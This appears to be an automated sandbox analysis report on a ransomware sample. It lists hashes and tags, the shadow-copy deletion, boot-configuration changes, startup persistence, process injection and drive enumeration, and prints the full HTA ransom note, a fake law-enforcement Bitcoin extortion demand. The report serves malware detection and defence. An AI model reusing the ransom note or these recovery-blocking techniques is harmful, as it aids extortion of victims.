441116d55e97124a067207bf57483dd3462bccfb034e56c4152675b0dcb118e7

Analysis

max time kernel
126s
max time network
152s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
16-03-2024 15:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
Size

363KB
MD5

36a0cefeb8b0a606358142d4140ea7cf
SHA1

03ce13b4f60d2fc632b67b41b82b5e8cfaf9939f
SHA256

467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be
SHA512

63304f3ddca578beac157197581e6a2a762d9cf1fb08fa6ae85dcdc26340ae64badb0f4a9cb47521315c366b70bd0cf89bf1b72be29f89e2d91504cec7ca9093
SSDEEP

6144:VEwaWsAzrp8viKgjdCU641BHoKIPi2CRp2pFSnfJxLw/mq3pT+Qrm9m7s:G9UjdtzIKl2YY3SRxLw/BT+X

Score

10^/10

evasion ransomware upx

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N00fBwZXjOQTTX9M.hta

Ransom Note

<html> <head> <hta:application BORDER = "none" CAPTION = "No" CONTEXTMENU = "NO" INNERBORDER = "No" MAXIMIZEBUTTON = "No" MINIMIZEBUTTON = "No" NAVIGABLE = "No" SCROLL = "No" SCROLLFLAT = "No" SELECTION = "Yes" SHOWINTASKBAR = "No" SINGLEINSTANCE = "Yes" SYSMENU = "No"/> <style> body{ background-color:#000000; margin:0; } .vau{ margin:10px; height:520px; width:750px } .sc{ margin:1px 50px; font-size:40px; width:750px; height:30px; padding: 10px 20px 10px 20px; background-color:#000000; color:#e92124; font-family: Impact; text-transform: uppercase; text-align: center; } .sc1{ margin:1px 50px; font-size:20px; width: 750px; padding:20px; background-color:#000000; color: #e0dede; font-family: Georgia; text-align: left; } .gr{ margin: 10px 0px; color:#189f29; } .red{ margin: 10px 0px; color:#e92124; } .wh{ margin-top:0px; margin-bottom:10px; } .wt{ margin-top:10px; margin-bottom:0px; } </style> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/> <title>Notification</title> <script language="vbscript"> sub Window_Onload window.resizeTo 850,725 screenWidth = Document.ParentWindow.Screen.AvailWidth screenHeight = Document.ParentWindow.Screen.AvailHeight posLeft = (screenWidth - 850) / 2 posTop = (screenHeight - 725) / 2 window.moveTo posLeft, posTop end sub </script> </head> <body scroll="no"> <div class="vau"> <div class="sc"> All your files have been encrypted! </div> <div class="sc1"> <p class="wh">All of important data on this computer was encrypted with strong RSA-2048 algorithm due to the violation of the federal laws of the United States of America! (Article 1, Section 8, Clause 8; Article 202; Arcticle 210 of the Criminal Code of U.S.A. provides for a deprivation of liberty for four to twelve years.)</p> <b>Following violations were detected:</b><br /> Your IP adress was used to visit websites containing pornography, child pornography, zoophilia and child abuse!<br /> <p class="gr"><b>To unlock your files you have to pay the penalty!</b></p> <p class="red">You have only <b>96 hours</b> to recover your personal data! After this time your unique key will be deleted and file decryption will become impossible!</p> <p class="red">Each <b>12 hours</b> the payment size will be automatically increased by <b>100$</b>!</p> <p class="gr"><b>You must pay the penalty through the Bitcoin Wallet.</b></p> <p class="wt">To get your unique key and unlock files, you should send the following code:</p> <b class="gr">TAVOb1nrt0pLc0ui-67B38C0E52010C27</b><br /> to our agent e-mails:<br /> <b class="gr">[email protected]</b> or<br /> <b class="gr">[email protected]</b><br /> You will recieve all necessary instructions! </div> <div class="sc"> Hurry up or you will be arrested!!! </div> </div> </body> </html>

Emails

class="gr">[email protected]</b>

class="gr">[email protected]</b><br

URLs

http-equiv="Content-Type"

Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1808 2792 cmd.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

2532 bcdedit.exe
1800 bcdedit.exe
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

2968 cmd.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1808	2792	cmd.exe

pid	process
2532	bcdedit.exe
1800	bcdedit.exe

pid	process
2968	cmd.exe

Drops startup file 2 IoCs

Processes:

2km925ZW.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2km925ZW.lnk	2km925ZW.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N00fBwZXjOQTTX9M.hta	2km925ZW.exe

Executes dropped EXE 26 IoCs

Processes:

bZwDPohE.exe2km925ZW.exebZwDPohE.exe2km925ZW.exexr9qnma2.exe1GNLT2Tg.exe1YbAnN3f.exeRZQHvJ7k.exeMvC1pbCt.exeyoxm3vFb.exeo0fogtco.exef62i2ygu.exexr9qnma2.exe1GNLT2Tg.exe1YbAnN3f.exeMvC1pbCt.exeRZQHvJ7k.exeyoxm3vFb.exeo0fogtco.exef62i2ygu.exeiRHgv8BP.exeiRHgv8BP.exeKDCmSj3O.exetOBxViTf.exetOBxViTf.exeKDCmSj3O.exe

pid	process
2412	bZwDPohE.exe
2484	2km925ZW.exe
2788	bZwDPohE.exe
2512	2km925ZW.exe
772	xr9qnma2.exe
2772	1GNLT2Tg.exe
840	1YbAnN3f.exe
1164	RZQHvJ7k.exe
2240	MvC1pbCt.exe
396	yoxm3vFb.exe
1972	o0fogtco.exe
2728	f62i2ygu.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2636	1YbAnN3f.exe
1144	MvC1pbCt.exe
1928	RZQHvJ7k.exe
2988	yoxm3vFb.exe
2516	o0fogtco.exe
2036	f62i2ygu.exe
2028	iRHgv8BP.exe
2908	iRHgv8BP.exe
2064	KDCmSj3O.exe
1544	tOBxViTf.exe
2580	tOBxViTf.exe
1276	KDCmSj3O.exe

Loads dropped DLL 40 IoCs

Processes:

cmd.exe467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exebZwDPohE.execmd.execmd.execmd.execmd.exe2km925ZW.execmd.execmd.execmd.exexr9qnma2.execmd.exe1GNLT2Tg.exe1YbAnN3f.exeMvC1pbCt.exeRZQHvJ7k.exeyoxm3vFb.exeo0fogtco.exef62i2ygu.execmd.exeiRHgv8BP.execmd.execmd.exetOBxViTf.exeKDCmSj3O.exe

pid	process
2516	cmd.exe
2516	cmd.exe
2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
2412	bZwDPohE.exe
2152	cmd.exe
2152	cmd.exe
592	cmd.exe
592	cmd.exe
940	cmd.exe
940	cmd.exe
2268	cmd.exe
2268	cmd.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2712	cmd.exe
2712	cmd.exe
1856	cmd.exe
1856	cmd.exe
2312	cmd.exe
2312	cmd.exe
772	xr9qnma2.exe
1372	cmd.exe
1372	cmd.exe
2772	1GNLT2Tg.exe
840	1YbAnN3f.exe
2240	MvC1pbCt.exe
1164	RZQHvJ7k.exe
396	yoxm3vFb.exe
1972	o0fogtco.exe
2728	f62i2ygu.exe
2580	cmd.exe
2580	cmd.exe
2028	iRHgv8BP.exe
2536	cmd.exe
2536	cmd.exe
1628	cmd.exe
1628	cmd.exe
1544	tOBxViTf.exe
2064	KDCmSj3O.exe

UPX packed file 29 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral14/memory/2688-5-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2688-4-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2688-8-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2688-9-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2688-10-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2688-11-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2688-12-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2688-27-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2788-50-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2788-59-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2788-61-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2512-220-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/1144-452-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2636-462-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2988-467-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2512-471-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/1928-473-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2516-474-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2036-475-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2516-493-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/1928-488-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2908-527-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2256-532-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2584-533-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2036-550-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2512-742-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2580-774-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/1276-777-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/1276-785-0x0000000000400000-0x0000000000510000-memory.dmp	upx

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

tOBxViTf.exexr9qnma2.exeMvC1pbCt.exeiRHgv8BP.exebZwDPohE.exe2km925ZW.exe467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe1YbAnN3f.exeyoxm3vFb.exeRZQHvJ7k.exe1GNLT2Tg.exeo0fogtco.exef62i2ygu.exeKDCmSj3O.exe

description	ioc	process
File opened (read-only)	\??\H:	tOBxViTf.exe
File opened (read-only)	\??\J:	xr9qnma2.exe
File opened (read-only)	\??\P:	MvC1pbCt.exe
File opened (read-only)	\??\U:	iRHgv8BP.exe
File opened (read-only)	\??\O:	bZwDPohE.exe
File opened (read-only)	\??\N:	bZwDPohE.exe
File opened (read-only)	\??\G:	2km925ZW.exe
File opened (read-only)	\??\L:	xr9qnma2.exe
File opened (read-only)	\??\X:	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
File opened (read-only)	\??\Z:	MvC1pbCt.exe
File opened (read-only)	\??\W:	bZwDPohE.exe
File opened (read-only)	\??\Q:	2km925ZW.exe
File opened (read-only)	\??\L:	2km925ZW.exe
File opened (read-only)	\??\U:	tOBxViTf.exe
File opened (read-only)	\??\Y:	1YbAnN3f.exe
File opened (read-only)	\??\Y:	yoxm3vFb.exe
File opened (read-only)	\??\R:	RZQHvJ7k.exe
File opened (read-only)	\??\K:	iRHgv8BP.exe
File opened (read-only)	\??\K:	tOBxViTf.exe
File opened (read-only)	\??\K:	bZwDPohE.exe
File opened (read-only)	\??\G:	1GNLT2Tg.exe
File opened (read-only)	\??\S:	o0fogtco.exe
File opened (read-only)	\??\N:	o0fogtco.exe
File opened (read-only)	\??\U:	f62i2ygu.exe
File opened (read-only)	\??\K:	f62i2ygu.exe
File opened (read-only)	\??\J:	tOBxViTf.exe
File opened (read-only)	\??\Z:	1GNLT2Tg.exe
File opened (read-only)	\??\U:	1GNLT2Tg.exe
File opened (read-only)	\??\Q:	xr9qnma2.exe
File opened (read-only)	\??\H:	MvC1pbCt.exe
File opened (read-only)	\??\I:	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
File opened (read-only)	\??\S:	1YbAnN3f.exe
File opened (read-only)	\??\U:	MvC1pbCt.exe
File opened (read-only)	\??\V:	f62i2ygu.exe
File opened (read-only)	\??\Z:	bZwDPohE.exe
File opened (read-only)	\??\L:	o0fogtco.exe
File opened (read-only)	\??\X:	iRHgv8BP.exe
File opened (read-only)	\??\L:	tOBxViTf.exe
File opened (read-only)	\??\Q:	KDCmSj3O.exe
File opened (read-only)	\??\Y:	MvC1pbCt.exe
File opened (read-only)	\??\T:	MvC1pbCt.exe
File opened (read-only)	\??\O:	f62i2ygu.exe
File opened (read-only)	\??\N:	RZQHvJ7k.exe
File opened (read-only)	\??\X:	1GNLT2Tg.exe
File opened (read-only)	\??\W:	MvC1pbCt.exe
File opened (read-only)	\??\R:	MvC1pbCt.exe
File opened (read-only)	\??\V:	MvC1pbCt.exe
File opened (read-only)	\??\R:	o0fogtco.exe
File opened (read-only)	\??\R:	xr9qnma2.exe
File opened (read-only)	\??\U:	o0fogtco.exe
File opened (read-only)	\??\I:	o0fogtco.exe
File opened (read-only)	\??\R:	tOBxViTf.exe
File opened (read-only)	\??\O:	1GNLT2Tg.exe
File opened (read-only)	\??\I:	MvC1pbCt.exe
File opened (read-only)	\??\Z:	f62i2ygu.exe
File opened (read-only)	\??\H:	o0fogtco.exe
File opened (read-only)	\??\W:	1YbAnN3f.exe
File opened (read-only)	\??\N:	1YbAnN3f.exe
File opened (read-only)	\??\H:	1YbAnN3f.exe
File opened (read-only)	\??\E:	o0fogtco.exe
File opened (read-only)	\??\P:	2km925ZW.exe
File opened (read-only)	\??\J:	2km925ZW.exe
File opened (read-only)	\??\M:	1GNLT2Tg.exe
File opened (read-only)	\??\H:	xr9qnma2.exe

Suspicious use of SetThreadContext 14 IoCs

Processes:

467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exebZwDPohE.exe2km925ZW.exexr9qnma2.exe1GNLT2Tg.exe1YbAnN3f.exeMvC1pbCt.exeRZQHvJ7k.exeyoxm3vFb.exeo0fogtco.exef62i2ygu.exeiRHgv8BP.exetOBxViTf.exeKDCmSj3O.exe

description	pid	process	target process
PID 2100 set thread context of 2688	2100	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
PID 2412 set thread context of 2788	2412	bZwDPohE.exe	bZwDPohE.exe
PID 2484 set thread context of 2512	2484	2km925ZW.exe	2km925ZW.exe
PID 772 set thread context of 2256	772	xr9qnma2.exe	xr9qnma2.exe
PID 2772 set thread context of 2584	2772	1GNLT2Tg.exe	1GNLT2Tg.exe
PID 840 set thread context of 2636	840	1YbAnN3f.exe	1YbAnN3f.exe
PID 2240 set thread context of 1144	2240	MvC1pbCt.exe	MvC1pbCt.exe
PID 1164 set thread context of 1928	1164	RZQHvJ7k.exe	RZQHvJ7k.exe
PID 396 set thread context of 2988	396	yoxm3vFb.exe	yoxm3vFb.exe
PID 1972 set thread context of 2516	1972	o0fogtco.exe	o0fogtco.exe
PID 2728 set thread context of 2036	2728	f62i2ygu.exe	f62i2ygu.exe
PID 2028 set thread context of 2908	2028	iRHgv8BP.exe	iRHgv8BP.exe
PID 1544 set thread context of 2580	1544	tOBxViTf.exe	tOBxViTf.exe
PID 2064 set thread context of 1276	2064	KDCmSj3O.exe	KDCmSj3O.exe

Drops file in Program Files directory 1 IoCs

Processes:

cmd.exe

description ioc process

File opened for modification C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\N00fBwZXjOQTTX9M.hta cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

2408 vssadmin.exe
2808 vssadmin.exe
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

description	ioc	process
File opened for modification	C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\N00fBwZXjOQTTX9M.hta	cmd.exe

pid	process
2408	vssadmin.exe
2808	vssadmin.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Runs ping.exe 1 TTPs 14 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
1320	PING.EXE
948	PING.EXE
2428	PING.EXE
1160	PING.EXE
1484	PING.EXE
2028	PING.EXE
1708	PING.EXE
2980	PING.EXE
2432	PING.EXE
2904	PING.EXE
784	PING.EXE
2700	PING.EXE
1248	PING.EXE
556	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe2km925ZW.exe1GNLT2Tg.exexr9qnma2.exe

pid	process
2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

Processes:

WMIC.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2308	WMIC.exe
Token: SeSecurityPrivilege	2308	WMIC.exe
Token: SeTakeOwnershipPrivilege	2308	WMIC.exe
Token: SeLoadDriverPrivilege	2308	WMIC.exe
Token: SeSystemProfilePrivilege	2308	WMIC.exe
Token: SeSystemtimePrivilege	2308	WMIC.exe
Token: SeProfSingleProcessPrivilege	2308	WMIC.exe
Token: SeIncBasePriorityPrivilege	2308	WMIC.exe
Token: SeCreatePagefilePrivilege	2308	WMIC.exe
Token: SeBackupPrivilege	2308	WMIC.exe
Token: SeRestorePrivilege	2308	WMIC.exe
Token: SeShutdownPrivilege	2308	WMIC.exe
Token: SeDebugPrivilege	2308	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2308	WMIC.exe
Token: SeRemoteShutdownPrivilege	2308	WMIC.exe
Token: SeUndockPrivilege	2308	WMIC.exe
Token: SeManageVolumePrivilege	2308	WMIC.exe
Token: 33	2308	WMIC.exe
Token: 34	2308	WMIC.exe
Token: 35	2308	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2308	WMIC.exe
Token: SeSecurityPrivilege	2308	WMIC.exe
Token: SeTakeOwnershipPrivilege	2308	WMIC.exe
Token: SeLoadDriverPrivilege	2308	WMIC.exe
Token: SeSystemProfilePrivilege	2308	WMIC.exe
Token: SeSystemtimePrivilege	2308	WMIC.exe
Token: SeProfSingleProcessPrivilege	2308	WMIC.exe
Token: SeIncBasePriorityPrivilege	2308	WMIC.exe
Token: SeCreatePagefilePrivilege	2308	WMIC.exe
Token: SeBackupPrivilege	2308	WMIC.exe
Token: SeRestorePrivilege	2308	WMIC.exe
Token: SeShutdownPrivilege	2308	WMIC.exe
Token: SeDebugPrivilege	2308	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2308	WMIC.exe
Token: SeRemoteShutdownPrivilege	2308	WMIC.exe
Token: SeUndockPrivilege	2308	WMIC.exe
Token: SeManageVolumePrivilege	2308	WMIC.exe
Token: 33	2308	WMIC.exe
Token: 34	2308	WMIC.exe
Token: 35	2308	WMIC.exe
Token: SeBackupPrivilege	2504	vssvc.exe
Token: SeRestorePrivilege	2504	vssvc.exe
Token: SeAuditPrivilege	2504	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.execmd.execmd.exebZwDPohE.exe2km925ZW.exebZwDPohE.exe2km925ZW.execmd.execmd.exe

description	pid	process	target process
PID 2100 wrote to memory of 2688	2100	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
PID 2100 wrote to memory of 2688	2100	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
PID 2100 wrote to memory of 2688	2100	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
PID 2100 wrote to memory of 2688	2100	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
PID 2100 wrote to memory of 2688	2100	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
PID 2100 wrote to memory of 2688	2100	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
PID 2100 wrote to memory of 2688	2100	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
PID 2100 wrote to memory of 2688	2100	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
PID 2688 wrote to memory of 2832	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	cmd.exe
PID 2688 wrote to memory of 2832	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	cmd.exe
PID 2688 wrote to memory of 2832	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	cmd.exe
PID 2688 wrote to memory of 2832	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	cmd.exe
PID 2688 wrote to memory of 2516	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	cmd.exe
PID 2688 wrote to memory of 2516	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	cmd.exe
PID 2688 wrote to memory of 2516	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	cmd.exe
PID 2688 wrote to memory of 2516	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	cmd.exe
PID 2516 wrote to memory of 2412	2516	cmd.exe	bZwDPohE.exe
PID 2516 wrote to memory of 2412	2516	cmd.exe	bZwDPohE.exe
PID 2516 wrote to memory of 2412	2516	cmd.exe	bZwDPohE.exe
PID 2516 wrote to memory of 2412	2516	cmd.exe	bZwDPohE.exe
PID 2688 wrote to memory of 2484	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	2km925ZW.exe
PID 2688 wrote to memory of 2484	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	2km925ZW.exe
PID 2688 wrote to memory of 2484	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	2km925ZW.exe
PID 2688 wrote to memory of 2484	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	2km925ZW.exe
PID 2688 wrote to memory of 2968	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	cmd.exe
PID 2688 wrote to memory of 2968	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	cmd.exe
PID 2688 wrote to memory of 2968	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	cmd.exe
PID 2688 wrote to memory of 2968	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	cmd.exe
PID 2968 wrote to memory of 2980	2968	cmd.exe	PING.EXE
PID 2968 wrote to memory of 2980	2968	cmd.exe	PING.EXE
PID 2968 wrote to memory of 2980	2968	cmd.exe	PING.EXE
PID 2968 wrote to memory of 2980	2968	cmd.exe	PING.EXE
PID 2412 wrote to memory of 2788	2412	bZwDPohE.exe	bZwDPohE.exe
PID 2412 wrote to memory of 2788	2412	bZwDPohE.exe	bZwDPohE.exe
PID 2412 wrote to memory of 2788	2412	bZwDPohE.exe	bZwDPohE.exe
PID 2412 wrote to memory of 2788	2412	bZwDPohE.exe	bZwDPohE.exe
PID 2412 wrote to memory of 2788	2412	bZwDPohE.exe	bZwDPohE.exe
PID 2412 wrote to memory of 2788	2412	bZwDPohE.exe	bZwDPohE.exe
PID 2412 wrote to memory of 2788	2412	bZwDPohE.exe	bZwDPohE.exe
PID 2412 wrote to memory of 2788	2412	bZwDPohE.exe	bZwDPohE.exe
PID 2484 wrote to memory of 2512	2484	2km925ZW.exe	2km925ZW.exe
PID 2484 wrote to memory of 2512	2484	2km925ZW.exe	2km925ZW.exe
PID 2484 wrote to memory of 2512	2484	2km925ZW.exe	2km925ZW.exe
PID 2484 wrote to memory of 2512	2484	2km925ZW.exe	2km925ZW.exe
PID 2484 wrote to memory of 2512	2484	2km925ZW.exe	2km925ZW.exe
PID 2484 wrote to memory of 2512	2484	2km925ZW.exe	2km925ZW.exe
PID 2484 wrote to memory of 2512	2484	2km925ZW.exe	2km925ZW.exe
PID 2484 wrote to memory of 2512	2484	2km925ZW.exe	2km925ZW.exe
PID 2788 wrote to memory of 2400	2788	bZwDPohE.exe	cmd.exe
PID 2788 wrote to memory of 2400	2788	bZwDPohE.exe	cmd.exe
PID 2788 wrote to memory of 2400	2788	bZwDPohE.exe	cmd.exe
PID 2788 wrote to memory of 2400	2788	bZwDPohE.exe	cmd.exe
PID 2512 wrote to memory of 2152	2512	2km925ZW.exe	cmd.exe
PID 2512 wrote to memory of 2152	2512	2km925ZW.exe	cmd.exe
PID 2512 wrote to memory of 2152	2512	2km925ZW.exe	cmd.exe
PID 2512 wrote to memory of 2152	2512	2km925ZW.exe	cmd.exe
PID 2400 wrote to memory of 948	2400	cmd.exe	PING.EXE
PID 2400 wrote to memory of 948	2400	cmd.exe	PING.EXE
PID 2400 wrote to memory of 948	2400	cmd.exe	PING.EXE
PID 2400 wrote to memory of 948	2400	cmd.exe	PING.EXE
PID 2152 wrote to memory of 772	2152	cmd.exe	xr9qnma2.exe
PID 2152 wrote to memory of 772	2152	cmd.exe	xr9qnma2.exe
PID 2152 wrote to memory of 772	2152	cmd.exe	xr9qnma2.exe
PID 2152 wrote to memory of 772	2152	cmd.exe	xr9qnma2.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 46 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

